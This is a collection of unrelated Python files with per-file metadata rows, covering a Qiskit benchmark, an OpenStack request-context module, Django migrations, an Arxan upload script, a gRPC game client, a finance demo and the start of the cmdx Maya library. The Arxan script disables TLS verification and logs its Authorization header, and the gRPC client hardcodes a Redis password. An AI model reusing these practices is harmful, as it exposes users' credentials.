| tests/conftest.py | 3,280 | Copyright 2018 HTCondor Team, Computer Sciences Department, University of Wisconsin-Madison, WI. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. start with base settings (ignore user settings for tests) shared is the default for all tests that aren't parametric shared is the default for parametric delivery testing | 788 | en | 0.858723 |
# qubit number=5
# total number=40
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.cx(input_qubit[4],input_qubit[0]) # number=30
prog.h(input_qubit[0]) # number=36
prog.cz(input_qubit[4],input_qubit[0]) # number=37
prog.h(input_qubit[0]) # number=38
prog.z(input_qubit[4]) # number=34
prog.cx(input_qubit[4],input_qubit[0]) # number=35
prog.cx(input_qubit[4],input_qubit[0]) # number=32
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(1):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.cx(input_qubit[1],input_qubit[2]) # number=39
prog.h(input_qubit[3]) # number=8
prog.x(input_qubit[0]) # number=9
prog.x(input_qubit[1]) # number=10
prog.cx(input_qubit[0],input_qubit[2]) # number=22
prog.x(input_qubit[2]) # number=23
prog.cx(input_qubit[0],input_qubit[2]) # number=24
prog.cx(input_qubit[0],input_qubit[3]) # number=25
prog.x(input_qubit[3]) # number=26
prog.cx(input_qubit[0],input_qubit[3]) # number=27
prog.y(input_qubit[2]) # number=29
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.h(input_qubit[0])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = BasicAer.get_backend('qasm_simulator')
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit843.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| benchmark/startQiskit843.py | 3,926 | qubit number=5 total number=40 implement the oracle O_f^\pm NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate or multi_control_Z_gate (issue 127) oracle.h(controls[n]) oracle.barrier() circuit begin number=3 number=4 number=5 number=6 number=30 number=36 number=37 number=38 number=34 number=35 number=32 number=21 number=1 number=2 number=7 number=39 number=8 number=9 number=10 number=22 number=23 number=24 number=25 number=26 number=27 number=29 number=13 number=14 number=15 number=16 number=17 number=18 number=19 number=20 circuit end | 549 | en | 0.220307 |
# Copyright 2011 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""RequestContext: context for requests that persist through all of patron."""
import copy
from keystoneclient import auth
from keystoneclient import service_catalog
from oslo_context import context
from oslo_log import log as logging
from oslo_utils import timeutils
import six
from patron import exception
from patron.i18n import _, _LW
from patron import policy
LOG = logging.getLogger(__name__)
class _ContextAuthPlugin(auth.BaseAuthPlugin):
"""A keystoneclient auth plugin that uses the values from the Context.
Ideally we would use the plugin provided by auth_token middleware however
this plugin isn't serialized yet so we construct one from the serialized
auth data.
"""
def __init__(self, auth_token, sc):
super(_ContextAuthPlugin, self).__init__()
self.auth_token = auth_token
sc = {'serviceCatalog': sc}
self.service_catalog = service_catalog.ServiceCatalogV2(sc)
def get_token(self, *args, **kwargs):
return self.auth_token
def get_endpoint(self, session, service_type=None, interface=None,
region_name=None, service_name=None, **kwargs):
return self.service_catalog.url_for(service_type=service_type,
service_name=service_name,
endpoint_type=interface,
region_name=region_name)
class RequestContext(context.RequestContext):
"""Security context and request information.
Represents the user taking a given action within the system.
"""
def __init__(self, user_id=None, project_id=None,
is_admin=None, read_deleted="no",
roles=None, remote_address=None, timestamp=None,
request_id=None, auth_token=None, overwrite=True,
quota_class=None, user_name=None, project_name=None,
service_catalog=None, instance_lock_checked=False,
user_auth_plugin=None, **kwargs):
""":param read_deleted: 'no' indicates deleted records are hidden,
'yes' indicates deleted records are visible,
'only' indicates that *only* deleted records are visible.
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param user_auth_plugin: The auth plugin for the current request's
authentication data.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
"""
user = kwargs.pop('user', None)
tenant = kwargs.pop('tenant', None)
super(RequestContext, self).__init__(
auth_token=auth_token,
user=user_id or user,
tenant=project_id or tenant,
domain=kwargs.pop('domain', None),
user_domain=kwargs.pop('user_domain', None),
project_domain=kwargs.pop('project_domain', None),
is_admin=is_admin,
read_only=kwargs.pop('read_only', False),
show_deleted=kwargs.pop('show_deleted', False),
request_id=request_id,
resource_uuid=kwargs.pop('resource_uuid', None),
overwrite=overwrite)
# oslo_context's RequestContext.to_dict() generates this field, we can
# safely ignore this as we don't use it.
kwargs.pop('user_identity', None)
if kwargs:
LOG.warning(_LW('Arguments dropped when creating context: %s') %
str(kwargs))
# FIXME(dims): user_id and project_id duplicate information that is
# already present in the oslo_context's RequestContext. We need to
# get rid of them.
self.user_id = user_id
self.project_id = project_id
self.roles = roles or []
self.read_deleted = read_deleted
self.remote_address = remote_address
if not timestamp:
timestamp = timeutils.utcnow()
if isinstance(timestamp, six.string_types):
timestamp = timeutils.parse_strtime(timestamp)
self.timestamp = timestamp
if service_catalog:
# Only include required parts of service_catalog
self.service_catalog = [s for s in service_catalog
if s.get('type') in ('volume', 'volumev2', 'key-manager')]
else:
# if list is empty or none
self.service_catalog = []
self.instance_lock_checked = instance_lock_checked
# NOTE(markmc): this attribute is currently only used by the
# rs_limits turnstile pre-processor.
# See https://lists.launchpad.net/openstack/msg12200.html
self.quota_class = quota_class
self.user_name = user_name
self.project_name = project_name
self.is_admin = is_admin
self.user_auth_plugin = user_auth_plugin
if self.is_admin is None:
self.is_admin = policy.check_is_admin(self)
def get_auth_plugin(self):
if self.user_auth_plugin:
return self.user_auth_plugin
else:
return _ContextAuthPlugin(self.auth_token, self.service_catalog)
def _get_read_deleted(self):
return self._read_deleted
def _set_read_deleted(self, read_deleted):
if read_deleted not in ('no', 'yes', 'only'):
raise ValueError(_("read_deleted can only be one of 'no', "
"'yes' or 'only', not %r") % read_deleted)
self._read_deleted = read_deleted
def _del_read_deleted(self):
del self._read_deleted
read_deleted = property(_get_read_deleted, _set_read_deleted,
_del_read_deleted)
def to_dict(self):
values = super(RequestContext, self).to_dict()
# FIXME(dims): defensive hasattr() checks need to be
# removed once we figure out why we are seeing stack
# traces
values.update({
'user_id': getattr(self, 'user_id', None),
'project_id': getattr(self, 'project_id', None),
'is_admin': getattr(self, 'is_admin', None),
'read_deleted': getattr(self, 'read_deleted', 'no'),
'roles': getattr(self, 'roles', None),
'remote_address': getattr(self, 'remote_address', None),
'timestamp': timeutils.strtime(self.timestamp) if hasattr(
self, 'timestamp') else None,
'request_id': getattr(self, 'request_id', None),
'quota_class': getattr(self, 'quota_class', None),
'user_name': getattr(self, 'user_name', None),
'service_catalog': getattr(self, 'service_catalog', None),
'project_name': getattr(self, 'project_name', None),
'instance_lock_checked': getattr(self, 'instance_lock_checked',
False)
})
return values
@classmethod
def from_dict(cls, values):
return cls(**values)
def elevated(self, read_deleted=None, overwrite=False):
"""Return a version of this context with admin flag set."""
context = copy.deepcopy(self)
context.is_admin = True
if 'admin' not in context.roles:
context.roles.append('admin')
if read_deleted is not None:
context.read_deleted = read_deleted
return context
def __str__(self):
return "<Context %s>" % self.to_dict()
def get_admin_context(read_deleted="no"):
return RequestContext(user_id=None,
project_id=None,
is_admin=True,
read_deleted=read_deleted,
overwrite=False)
def is_user_context(context):
"""Indicates if the request context is a normal user."""
if not context:
return False
if context.is_admin:
return False
if not context.user_id or not context.project_id:
return False
return True
def require_admin_context(ctxt):
"""Raise exception.AdminRequired() if context is an admin context."""
if not ctxt.is_admin:
raise exception.AdminRequired()
def require_context(ctxt):
"""Raise exception.Forbidden() if context is not a user or an
admin context.
"""
if not ctxt.is_admin and not is_user_context(ctxt):
raise exception.Forbidden()
def authorize_project_context(context, project_id):
"""Ensures a request has permission to access the given project."""
if is_user_context(context):
if not context.project_id:
raise exception.Forbidden()
elif context.project_id != project_id:
raise exception.Forbidden()
def authorize_user_context(context, user_id):
"""Ensures a request has permission to access the given user."""
if is_user_context(context):
if not context.user_id:
raise exception.Forbidden()
elif context.user_id != user_id:
raise exception.Forbidden()
def authorize_quota_class_context(context, class_name):
"""Ensures a request has permission to access the given quota class."""
if is_user_context(context):
if not context.quota_class:
raise exception.Forbidden()
elif context.quota_class != class_name:
raise exception.Forbidden()
| patron/context.py | 10,195 | Security context and request information.
Represents the user taking a given action within the system.
A keystoneclient auth plugin that uses the values from the Context.
Ideally we would use the plugin provided by auth_token middleware however
this plugin isn't serialized yet so we construct one from the serialized
auth data.
:param read_deleted: 'no' indicates deleted records are hidden,
'yes' indicates deleted records are visible,
'only' indicates that *only* deleted records are visible.
:param overwrite: Set to False to ensure that the greenthread local
copy of the index is not overwritten.
:param user_auth_plugin: The auth plugin for the current request's
authentication data.
:param kwargs: Extra arguments that might be present, but we ignore
because they possibly came in from older rpc messages.
Ensures a request has permission to access the given project.
Ensures a request has permission to access the given quota class.
Ensures a request has permission to access the given user.
Return a version of this context with admin flag set.
Indicates if the request context is a normal user.
Raise exception.AdminRequired() if context is an admin context.
Raise exception.Forbidden() if context is not a user or an
admin context.
RequestContext: context for requests that persist through all of patron.
Copyright 2011 OpenStack Foundation Copyright 2010 United States Government as represented by the Administrator of the National Aeronautics and Space Administration. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. oslo_context's RequestContext.to_dict() generates this field, we can safely ignore this as we don't use it. FIXME(dims): user_id and project_id duplicate information that is already present in the oslo_context's RequestContext. We need to get rid of them. Only include required parts of service_catalog if list is empty or none NOTE(markmc): this attribute is currently only used by the rs_limits turnstile pre-processor. See https://lists.launchpad.net/openstack/msg12200.html FIXME(dims): defensive hasattr() checks need to be removed once we figure out why we are seeing stack traces | 2,671 | en | 0.863667 |
# Generated by Django 3.2.5 on 2021-11-29 19:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("organisations", "0004_auto_20210718_1147"),
("schools", "0005_alter_school_courses_offered"),
]
operations = [
migrations.AlterField(
model_name="school",
name="courses_offered",
field=models.ManyToManyField(
blank=True,
related_name="schools",
related_query_name="schools",
to="organisations.Course",
verbose_name="courses",
),
),
]
| pucadmin/schools/migrations/0006_alter_school_courses_offered.py | 662 | Generated by Django 3.2.5 on 2021-11-29 19:04 | 45 | en | 0.719168 |
# Generated by Django 3.0 on 2020-10-19 06:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('accounts', '0003_auto_20200922_1738'),
]
operations = [
migrations.AlterField(
model_name='userprofile',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| accounts/migrations/0004_auto_20201019_1200.py | 444 | Generated by Django 3.0 on 2020-10-19 06:30 | 43 | en | 0.718975 |
#
# Copyright 2021 XEBIALABS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
import json
import requests
import org.slf4j.LoggerFactory as LoggerFactory
logger = LoggerFactory.getLogger("Arxan")
# New ARXAN logic
# setup the request url
api_token_endpoint = "/v2/apaas/apps"
url = server.get('url') + "%s" % api_token_endpoint
headers = {
'Content-Type': "application/x-www-form-urlencoded"
}
with open(file_path, 'rb') as app_file:
logger.info('Filepath: %s' % file_path)
files = {'appFile': app_file}
headers = {
'Authorization': auth_string,
}
data = {
'productId' : 'Essential Protection',
'protection': {
'appAware': {
'applicationToken': server.get('app_token'),
'endpoint': server.get('app_endpoint')
}
}
}
logger.info('Uploading file...')
logger.info('URL: %s' % url)
logger.info('Headers: %s' % json.dumps(headers))
logger.info('JSON: %s' % json.dumps(data))
response = requests.post(url, files = files, data = {'data': json.dumps(data)}, headers = headers, verify = False)
logger.info('Uploading app response status code: %s.' % response.status_code)
logger.info(response.json()['message'])
# output = response.json().get('protectionId')
if response.status_code == 200:
logger.info('App uploaded')
json_response = response.json()
logger.debug('App upload response: %s', json_response)
if 'protectionId' not in json_response:
logger.error('There was a problem uploading the app. Missing protectionId in the response')
else:
protection_id = json_response['protectionId']
logger.debug('App protection id is %s', protection_id)
output = protection_id
elif response.status_code == 400:
error_message = response.json()['message']
logger.error('There was a problem protecting %s', error_message)
elif response.status_code == 401 or response.status_code == 403:
raise AuthorizationError()
elif response.status_code == 404:
logger.error('Cannot reach server %s', server)
else:
logger.error('An unexpected error has occurred. (%d)', response.status_code)
raise Exception('Incorrect response code for upload app: (%s)', response.status_code) | build/resources/main/arxan/UploadApplication.py | 3,337 | Copyright 2021 XEBIALABS Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. New ARXAN logic setup the request url output = response.json().get('protectionId') | 1,128 | en | 0.845671 |
# Copyright 2015 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The Python implementation of the GRPC helloworld.Greeter client."""
from __future__ import print_function
import logging
from urllib import response
from vinte_um import Jogador, VinteUm
import grpc
import helloworld_pb2
import helloworld_pb2_grpc
import time
import redis
def createLoginForm(stub):
username = input("Digite seu login: ")
password = input("Digite sua senha: ")
_redis = redis.Redis(
host= 'localhost',
port= '6379',
password = 'davi')
_redis.set('username', username)
value = _redis.get('username')
print("variavel do redis:", value)
return stub.Login(helloworld_pb2.LoginRequest(username=username, password=password))
def runTurn(stub, auth_token):
extraCard = input("Deseja cavar mais uma carta? S/N: ")
return stub.TurnAction(helloworld_pb2.TurnRequest(auth_token=auth_token, dig = extraCard))
def run():
# NOTE(gRPC Python Team): .close() is possible on a channel and should be
# used in circumstances in which the with statement does not fit the needs
# of the code.
with grpc.insecure_channel('0.0.0.0:50051') as channel:
stub = helloworld_pb2_grpc.GreeterStub(channel)
login = createLoginForm(stub)
print("Suas cartas são: ", login.message)
while True:
turnResponse = runTurn(stub, login.auth_token)
print("Suas cartas são: ", turnResponse.cards)
if turnResponse.message:
print(turnResponse.message)
if turnResponse.playing == "False":
break
winner = stub.VerifyTurn(helloworld_pb2.VerifyTurnRequest(auth_token=login.auth_token))
print(winner.message)
if __name__ == '__main__':
logging.basicConfig()
run()
| examples/python/helloworld/greeter_client.py | 2,421 | The Python implementation of the GRPC helloworld.Greeter client.
Copyright 2015 gRPC authors. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. NOTE(gRPC Python Team): .close() is possible on a channel and should be used in circumstances in which the with statement does not fit the needs of the code. | 775 | en | 0.865565 |
__author__ = 'Randall'
from demos.setup import np, plt, demo
from compecon import DDPmodel
# DEMDDP04 Binomial American put option model
# Model Parameters
T = 0.5 # years to expiration
sigma = 0.2 # annual volatility
r = 0.05 # annual interest rate
strike = 2.1 # option strike price
p0 = 2.0 # current asset price
# Discretization Parameters
N = 100 # number of time intervals
tau = T / N # length of time intervals
delta = np.exp(-r * tau) # discount factor
u = np.exp(sigma * np.sqrt(tau)) # up jump factor
q = 0.5 + np.sqrt(tau) * (r - (sigma**2) / 2) / (2 * sigma) # up jump probability
# State Space
price = p0 * u ** np.arange(-N, N+1) # asset prices
n = price.size # number of states
# Action Space (hold=1, exercise=2)
X = ['hold', 'exercise'] # vector of actions
m = len(X) # number of actions
# Reward Function
f = np.zeros((m,n))
f[1] = strike - price
# State Transition Probability Matrix
P = np.zeros((m, n, n))
for i in range(n):
P[0, i, min(i + 1, n - 1)] = q
P[0, i, max(i - 1, 0)] = 1 - q
# Model Structure
model = DDPmodel(f, P, delta, horizon=N)
model.solve()
## Analysis
# Plot Optimal Exercise Boundary
i, j = np.where(np.diff(model.policy[:-1], 1))
temp = (i * tau)[::-1]
demo.figure('Put Option Optimal Exercise Boundary', 'Time to Maturity', 'Asset Price')
plt.plot(temp, price[j])
# Plot Option Premium vs. Asset Price
demo.figure('Put Option Value', 'Asset Price', 'Premium', [0, 2 * strike])
plt.plot([0, strike],[strike, 0], 'k--', lw=2)
plt.plot(price, model.value[0], lw=3)
plt.show() | compecon/demos/demddp04.py | 1,683 | DEMDDP04 Binomial American put option model Model Parameters years to expiration annual volatility annual interest rate option strike price current asset price Discretization Parameters number of time intervals length of time intervals discount factor up jump factor up jump probability State Space asset prices number of states Action Space (hold=1, exercise=2) vector of actions number of actions Reward Function State Transition Probability Matrix Model Structure Analysis Plot Optimal Exercise Boundary Plot Option Premium vs. Asset Price | 542 | en | 0.689587 |
#!/usr/bin/env python
# Helpful little script that spits out a comma-separated list of
# language codes for Qt icons that should be included
# in binary Astercoin Core distributions
import glob
import os
import re
import sys
if len(sys.argv) != 3:
sys.exit("Usage: %s $QTDIR/translations $BITCOINDIR/src/qt/locale"%sys.argv[0])
d1 = sys.argv[1]
d2 = sys.argv[2]
l1 = set([ re.search(r'qt_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d1, 'qt_*.qm')) ])
l2 = set([ re.search(r'astercoin_(.*).qm', f).group(1) for f in glob.glob(os.path.join(d2, 'astercoin_*.qm')) ])
print ",".join(sorted(l1.intersection(l2)))
| contrib/qt_translations.py | 627 | !/usr/bin/env python Helpful little script that spits out a comma-separated list of language codes for Qt icons that should be included in binary Astercoin Core distributions | 174 | en | 0.830021 |
# -*- coding: utf-8 -*-
import os
import sys
import json
import time
import math
import types
import logging
import traceback
import operator
import collections
from functools import wraps
from maya import cmds
from maya.api import OpenMaya as om, OpenMayaAnim as oma, OpenMayaUI as omui
from maya import OpenMaya as om1, OpenMayaMPx as ompx1, OpenMayaUI as omui1
__version__ = "0.4.6"
PY3 = sys.version_info[0] == 3
# Bypass assertion error on unsupported Maya versions
IGNORE_VERSION = bool(os.getenv("CMDX_IGNORE_VERSION"))
# Output profiling information to console
# CAREFUL! This will flood your console. Use sparingly.
TIMINGS = bool(os.getenv("CMDX_TIMINGS"))
# Do not perform any caching of nodes or plugs
SAFE_MODE = bool(os.getenv("CMDX_SAFE_MODE"))
# Increase performance by not protecting against
# fatal crashes (e.g. operations on deleted nodes)
# This can be useful when you know for certain that a
# series of operations will happen in isolation, such
# as during an auto rigging build or export process.
ROGUE_MODE = not SAFE_MODE and bool(os.getenv("CMDX_ROGUE_MODE"))
# Increase performance by not bothering to free up unused memory
MEMORY_HOG_MODE = not SAFE_MODE and bool(os.getenv("CMDX_MEMORY_HOG_MODE"))
ENABLE_PEP8 = True
# Support undo/redo
ENABLE_UNDO = not SAFE_MODE
# Required
ENABLE_PLUG_REUSE = True
if PY3:
string_types = str,
else:
string_types = str, basestring, unicode
try:
__maya_version__ = int(cmds.about(version=True))
except (AttributeError, ValueError):
__maya_version__ = 2015 # E.g. Preview Release 95
if not IGNORE_VERSION:
assert __maya_version__ >= 2015, "Requires Maya 2015 or newer"
self = sys.modules[__name__]
self.installed = False
log = logging.getLogger("cmdx")
# Aliases - API 1.0
om1 = om1
omui1 = omui1
# Aliases - API 2.0
om = om
oma = oma
omui = omui
# Accessible via `cmdx.NodeReuseCount` etc.
Stats = self
Stats.NodeInitCount = 0
Stats.NodeReuseCount = 0
Stats.PlugReuseCount = 0
Stats.LastTiming = None
# Node reuse depends on this member
if not hasattr(om, "MObjectHandle"):
log.warning("Node reuse might not work in this version of Maya "
"(OpenMaya.MObjectHandle not found)")
TimeUnit = om.MTime.uiUnit()
# DEPRECATED
MTime = om.MTime
MDistance = om.MDistance
MAngle = om.MAngle
TimeType = om.MTime
DistanceType = om.MDistance
AngleType = om.MAngle
ExistError = type("ExistError", (RuntimeError,), {})
DoNothing = None
# Reusable objects, for performance
GlobalDagNode = om.MFnDagNode()
GlobalDependencyNode = om.MFnDependencyNode()
First = 0
Last = -1
# Animation curve interpolation, from MFnAnimCurve::TangentType
Stepped = 5
Linear = 2
Smooth = 4
history = dict()
class ModifierError(RuntimeError):
def __init__(self, history):
tasklist = list()
for task in history:
cmd, args, kwargs = task
tasklist += [
"%s(%s)" % (cmd, ", ".join(map(repr, args)))
]
message = (
"An unexpected internal failure occurred, "
"these tasks were attempted:\n- " +
"\n- ".join(tasklist)
)
self.history = history
super(ModifierError, self).__init__(message)
def withTiming(text="{func}() {time:.2f} ns"):
"""Append timing information to a function
Example:
@withTiming()
def function():
pass
"""
def timings_decorator(func):
if not TIMINGS:
# Do not wrap the function.
# This yields zero cost to runtime performance
return func
@wraps(func)
def func_wrapper(*args, **kwargs):
t0 = time.clock()
try:
return func(*args, **kwargs)
finally:
t1 = time.clock()
duration = (t1 - t0) * 10 ** 6 # microseconds
Stats.LastTiming = duration
log.debug(
text.format(func=func.__name__,
time=duration)
)
return func_wrapper
return timings_decorator
def protected(func):
"""Prevent fatal crashes from illegal access to deleted nodes"""
if ROGUE_MODE:
return func
@wraps(func)
def func_wrapper(*args, **kwargs):
if args[0]._destroyed:
raise ExistError("Cannot perform operation on deleted node")
return func(*args, **kwargs)
return func_wrapper
def add_metaclass(metaclass):
"""Add metaclass to Python 2 and 3 class
Helper decorator, from six.py
"""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
if hasattr(cls, '__qualname__'):
orig_vars['__qualname__'] = cls.__qualname__
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
class _Type(int):
"""Facilitate use of isinstance(space, _Type)"""
MFn = om.MFn
kDagNode = _Type(om.MFn.kDagNode)
kShape = _Type(om.MFn.kShape)
kTransform = _Type(om.MFn.kTransform)
kJoint = _Type(om.MFn.kJoint)
kSet = _Type(om.MFn.kSet)
class _Space(int):
"""Facilitate use of isinstance(space, _Space)"""
# Spaces
sWorld = _Space(om.MSpace.kWorld)
sObject = _Space(om.MSpace.kObject)
sTransform = _Space(om.MSpace.kTransform)
sPostTransform = _Space(om.MSpace.kPostTransform)
sPreTransform = _Space(om.MSpace.kPreTransform)
kXYZ = om.MEulerRotation.kXYZ
kYZX = om.MEulerRotation.kYZX
kZXY = om.MEulerRotation.kZXY
kXZY = om.MEulerRotation.kXZY
kYXZ = om.MEulerRotation.kYXZ
kZYX = om.MEulerRotation.kZYX
class _Unit(int):
"""A Maya unit, for unit-attributes such as Angle and Distance
Because the resulting classes are subclasses of `int`, there
is virtually no run-time performance penalty to using it as
an integer. No additional Python is called, most notably when
passing the integer class to the Maya C++ binding (which wouldn't
call our overridden methods anyway).
The added overhead to import time is neglible.
"""
def __new__(cls, unit, enum):
self = super(_Unit, cls).__new__(cls, enum)
self._unit = unit
return self
def __call__(self, enum):
return self._unit(enum, self)
# Angular units
Degrees = _Unit(om.MAngle, om.MAngle.kDegrees)
Radians = _Unit(om.MAngle, om.MAngle.kRadians)
AngularMinutes = _Unit(om.MAngle, om.MAngle.kAngMinutes)
AngularSeconds = _Unit(om.MAngle, om.MAngle.kAngSeconds)
# Distance units
Millimeters = _Unit(om.MDistance, om.MDistance.kMillimeters)
Centimeters = _Unit(om.MDistance, om.MDistance.kCentimeters)
Meters = _Unit(om.MDistance, om.MDistance.kMeters)
Kilometers = _Unit(om.MDistance, om.MDistance.kKilometers)
Inches = _Unit(om.MDistance, om.MDistance.kInches)
Feet = _Unit(om.MDistance, om.MDistance.kFeet)
Miles = _Unit(om.MDistance, om.MDistance.kMiles)
Yards = _Unit(om.MDistance, om.MDistance.kYards)
# Time units
Milliseconds = _Unit(om.MTime, om.MTime.kMilliseconds)
Minutes = _Unit(om.MTime, om.MTime.kMinutes)
Seconds = _Unit(om.MTime, om.MTime.kSeconds)
def UiUnit():
"""Unlike other time units, this can be modified by the user at run-time"""
return _Unit(om.MTime, om.MTime.uiUnit())
_Cached = type("Cached", (object,), {}) # For isinstance(x, _Cached)
Cached = _Cached()
_data = collections.defaultdict(dict)
class Singleton(type):
"""Re-use previous instances of Node
Cost: 14 microseconds
This enables persistent state of each node, even when
a node is discovered at a later time, such as via
:func:`DagNode.parent()` or :func:`DagNode.descendents()`
Arguments:
mobject (MObject): Maya API object to wrap
exists (bool, optional): Whether or not to search for
an existing Python instance of this node
Example:
>>> nodeA = createNode("transform", name="myNode")
>>> nodeB = createNode("transform", parent=nodeA)
>>> encode("|myNode") is nodeA
True
>>> nodeB.parent() is nodeA
True
"""
_instances = {}
@withTiming()
def __call__(cls, mobject, exists=True, modifier=None):
handle = om.MObjectHandle(mobject)
hsh = handle.hashCode()
hx = "%x" % hsh
if exists and handle.isValid():
try:
node = cls._instances[hx]
assert not node._destroyed
except (KeyError, AssertionError):
pass
else:
Stats.NodeReuseCount += 1
node._removed = False
return node
# It didn't exist, let's create one
# But first, make sure we instantiate the right type
if mobject.hasFn(om.MFn.kDagNode):
sup = DagNode
